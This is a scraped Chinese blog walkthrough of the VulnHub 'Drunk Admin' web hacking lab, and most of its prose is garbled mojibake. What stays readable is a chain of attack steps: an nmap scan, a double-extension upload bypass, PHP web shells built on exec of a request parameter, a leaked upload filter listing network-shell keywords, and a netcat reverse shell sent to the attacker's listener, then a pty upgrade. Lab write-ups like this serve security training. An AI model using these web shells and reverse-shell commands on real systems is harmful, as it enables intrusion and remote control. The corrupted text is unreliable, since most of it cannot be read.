VulnHub Drunk Admin Web Hacking Challenge: 1
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了VulnHub Drunk Admin Web Hacking Challenge: 1相关的知识,希望对你有一定的参考价值。
鏍囩锛?a href='http://www.mamicode.com/so/1/mission' title='mission'>mission
杈撳嚭 鍔犲瘑 hal nvl href 璇存槑 pre imaDownload
-
Download: http://bechtsoudis.com/data/challenges/drunk_admin_hacking_challenge.zip
-
Download:
https://download.vulnhub.com/drunkadminhackingchallenge/drunk_admin_hacking_challenge.zip -
Download :
https://download.vulnhub.com/drunkadminhackingchallenge/drunk_admin_hacking_challenge.zip.torrent
鍓嶈█
鍙戝竷鏃堕棿锛? Apr 2012
闈舵満IP锛?0.101.27.241
鏀诲嚮鏈篒P锛圞alli锛?10.101.27.128
绔彛鎵弿
nmap -sV 10.101.27.241 -p1-65536
鍙戠幇22绔彛寮€鍚簡ssh鏈嶅姟浠ュ強8880绔彛鐨刪ttp鏈嶅姟
璁块棶8880绔彛鐨勬湇鍔★紝鍙戠幇鏄竴涓浘鐗囦笂浼犵殑web搴旂敤
鎵弿缃戠珯鐩綍
灏濊瘯璁块棶涓嬪彂鐜?/p>
鏈ㄩ┈涓婁紶
寰椾粠鍥剧墖涓婁紶鍏ユ墜锛屽彂鐜颁笂浼犻潪鍥剧墖鏍煎紡鍚庣紑鏂囦欢锛屼細鏄剧ず锛?strong>Invalid file extension!
锛屽皢鍚庣紑鍚嶆敼涓?code>.php.jpg鍚庝笂浼犳垚鍔?/p>鍥剧墖鍦板潃涓猴細http://10.101.27.241:8880/images/b864b86cfa7d0935f61dac5eac9e91e8.jpg锛屽彲浠ョ湅鍒板浘鐗囨枃浠跺悕琚慨鏀瑰悗瀛樺叆锛岀寽娴嬩负MD5锛岄€氳繃hash-identifier楠岃瘉
鍙互寰楃煡瀛樺偍鐨勬枃浠跺悕鐨勮鍒欎负鏂囦欢鍚嶇殑MD5鍊煎姞涓婃枃浠跺悗缂€
鍙戠幇涓婁紶.jpg.php涔熸槸鍙互鐨勶紝鍦ㄦ枃浠朵腑鍐欏叆:
<?php echo "success";?>
璁$畻pic.jpg.php鐨凪D5鍊硷紝鐒跺悗璁块棶鍙戠幇php浠g爜琚墽琛屼簡
灏濊瘯鍐欏叆涓€鍙ヨ瘽鏈ㄩ┈锛?/p>
<?php echo exec($_GET[鈥渃md鈥漖); ?>
涓婁紶鍚庢樉绀猴細Ohhh you are naughty!锛屽彲瑙佽繘琛屼簡杩囨护琚嫤鎴?/p>
閫氳繃file_get_contents鍑芥暟鏌ョ湅upload.php鏂囦欢鐨勫唴瀹?/p>
<?php echo file_get_contents(鈥?./upload.php鈥?;?>
绠€鍗曟暣鐞嗕箣鍚庡涓嬶細
<?php
(MAX_SIZE*1024) {
echo 鈥榊ou have exceeded the size limit!鈥?
$errors=1;
}
$raw_name=md5($image);
$image_name=md5($image).鈥?鈥?$extension;
$newname="images/".$image_name;
$copied = copy($_FILES[鈥榠mage鈥榏[鈥榯mp_name鈥榏, $newname);
if (!$copied) {
echo 鈥楥opy unsuccessful!鈥?
$errors=1;
}
else {
echo 鈥業nvalid file extension!鈥?
$errors=1;
}
else {
echo 鈥楴o image selected. Be carefull next time!鈥?
$errors=1;
}
else {
echo 鈥楴o data? Come on give me something to play with!鈥?
$errors=1;
}
if(isset($_POST[鈥楽ubmit鈥榏) && !$errors) {
$file = file_get_contents("./images/$image_name");
if( strpos($file,"perl") ||
strpos($file,"bash") ||
strpos($file,"sh -c") ||
strpos($file,"python") ||
strpos($file,"nc ") ||
strpos($file,"netcat") ||
strpos($file,"base64") ||
strpos($file,"ruby") ||
strpos($file,"fsockopen") ||
strpos($file,"xterm") ||
strpos($file,"gcc") ||
strpos($file,鈥?_GET鈥? ||
strpos($file,鈥?_POST鈥? ||
strpos($file,鈥?_SERVER鈥? ||
strpos($file,鈥?_FILES鈥? ||
strpos($file,鈥?_COOKIE鈥? ) {
echo "Ohhh you are naughty!";
exec("rm ./images/$image_name");
die;
}
setcookie("trypios", "$raw_name", time()+3600);
echo 鈥樷€?
}
?>
鍛戒护鎵ц
鍙互鐪嬪埌瀵?code>鈥?_GET鈥?/code>杩涜浜嗚繃婊わ紝鎵€浠ュ湪寮€濮嬩笂浼犱竴鍙ヨ瘽鏈ㄩ┈鐨勬椂鍊欒緭鍑猴細"Ohhh you are naughty!"锛屼簬鏄箮鏋勯€犲涓嬫湪椹細
// filename:pic.jpg.php
// URL:http://10.101.27.241:8880/images/5fc28369a5fe906d8d884a82e1dafb8b.php?cmd=id
<?php echo exec($_REQUEST[鈥榗md鈥榏) ?>
鍙嶅脊shell
鍦╧ali涓婄洃鍚?46绔彛
nc -nvlp 446
鐒跺悗璁块棶鎵ц鍛戒护锛?/p>
http://10.101.27.241:8880/images/5fc28369a5fe906d8d884a82e1dafb8b.php?cmd=nc%2010.101.27.128%20446%20-e%20/bin/bash
鎴愬姛get shell锛屼娇鐢╬ython鎻愪緵鐨刾ty妯″潡鏉ヨ幏鍙栦竴涓爣鍑嗙殑shell
python -c 鈥榠mport pty;pty.spawn("/bin/bash")鈥?浠诲姟
FINAL GOAL: Reveal the hidden message for a date arrange that Bob sent to Alice.
闈舵満鎻忚堪涓殑鏈€缁堢洰鏍囧氨鎵惧埌闅愯棌鐨勪俊鎭紝鍏堟煡鐪嬩笅www鏂囦欢澶逛笅闈㈤兘鏈変粈涔?/p>
鍙戠幇鏈変釜.proof鐨勯殣钘忔枃浠讹紝鏌ョ湅涓€涓嬶紝鍙戠幇鍔犲瘑瀛楃涓诧細TGglMUxecjJDSDclN1Ej锛?/p>
鐪嬭捣鏉ュ儚鏄痓ase64锛岃В瀵嗚瘯璇曪紝寰楀埌锛?code>Lh%1L^r2CH7%7Q# 锛岀湅涓嶅嚭鏉ヤ粈涔堜笢瑗?/p>
灏濊瘯鎼滅储涓€娉㈠寘鍚?strong>encrypt鐨勬枃浠?/p>
find / -name "*encrypt*" 2>&1 | sed 鈥?Permission denied/d;鈥?鍙戠幇/home/bob/public_html/encrypt.php浼间箮鏈変簺涓滆タ锛岃繘鍏ヨ鏂囦欢鎵€鍦ㄧ殑鐩綍
鏂囦欢浣嶄簬public_html璇存槑鍙互鐩存帴閫氳繃娴忚鍣ㄦ潵杩涜璁块棶锛屼簬鏄闂細http://10.101.27.241:8880/~bob/index.php
鐪嬭捣鏉ユ槸涓€涓В瀵嗙殑搴旂敤锛屽皢鍒氬垰base64瑙e嚭鏉ョ殑瀛楃涓叉斁杩涘幓璇曚竴璇曪紝寰楀埌涓€涓粡绾害鐨勫潗鏍囷紝閫氳繃Google鍦板浘鏌ョ湅涓嬶紝鏄湪锛?strong>Akti Tompazi, Chania 731 32, Greece
http://www.cyberry.co.uk/vulnhub/drunk-admin-web-hacking-challenge-1/
以上是关于VulnHub Drunk Admin Web Hacking Challenge: 1的主要内容,如果未能解决你的问题,请参考以下文章